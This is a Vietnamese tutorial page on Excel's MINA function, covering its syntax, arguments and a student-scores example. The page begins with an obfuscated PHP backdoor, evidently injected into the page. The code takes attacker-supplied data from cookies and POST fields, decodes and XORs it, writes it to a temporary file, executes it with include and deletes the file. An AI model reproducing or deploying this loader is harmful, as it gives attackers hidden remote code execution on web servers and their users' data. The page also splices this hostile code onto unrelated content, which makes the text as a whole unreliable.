$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hướng dẫn cách dùng hàm MINA trong Excel - Tải Chùa

Hướng dẫn cách dùng hàm MINA trong Excel

Rate this post
Hàm MINA trong Excel có chức năng là tìm ra giá trị nhỏ nhất trong một dãy các ô hay các phần tử cho trước. Cú pháp và cách dùng của hàm MINA khá đơn giản.

Hàm MINA trong Excel là hàm trả về giá trị nhỏ nhất, kể cả các giá trị logic và các dạng biểu thị số bằng văn bản. Vậy sử dụng hàm MINA trong Excel có khó hay không?

Hàm MINA trong Excel

Hàm MINA trong Excel có chức năng là tìm ra giá trị nhỏ nhất trong một dãy các ô hay các phần tử cho trước. Cú pháp và cách dùng của hàm MINA khá đơn giản. Nếu bạn chưa biết cú pháp cũng như cách dùng hàm hày hãy theo dõi bài viết dưới đây của chúng tôi để có thể hiểu rõ hơn về hàm này nhé.

Cú Pháp: MINA(Value1, [value2], [value3])

Ý Nghĩa

  • Value1 là đối số bắt buộc. Còn Value2, Value3 là các tùy chọn.

Các đối số Value1, Value2, Value3 có thể là chữ số, tên hay dãy các ô (C1:C5), các giá trị tham chiếu (=C5), giá trị logic: TRUE ( có giá trị bằng 1) hoặc FALSE ( có giá trị bằng 0), hoặc các số viết dạng chữ ( one, two, three,…) thì hàm này tính giá trị của ô đó sẽ là 1.

Hướng dẫn sử dụng hàm MINA trong Excel

Hãy theo dõi ví dụ minh họa dưới đây để hiểu rõ hơn về hàm MINA này nhé. Cho bảng điểm của một số học sinh. Yêu cầu đặt ra là hãy tìm giá trị nhỏ nhất trong cột Scores được cho ở bảng trên.

cách sử dụng hàm MINA trong Excel - hình 1

Để tìm ra giá trị nhỏ nhất, thì bạn nên sử dụng hàm MINA với công thức tại Ô C11 là: MINA(D5,D6,D7,D8,D9) hoặc MINA(D5:D9). Khi đó, chúng ta sẽ được kết quả:

cách sử dụng hàm MINA trong Excel - hình 2

Sử dụng hàm MINA để tìm giá trị nhỏ nhất của dãy số hay tìm điểm số thấp nhất của các học sinh trong lớp và rất nhiều ứng dụng khác trong thực tế mà bạn nên áo dụng. Vậy nên, việc ghi nhớ công thức này là điều cần thiết.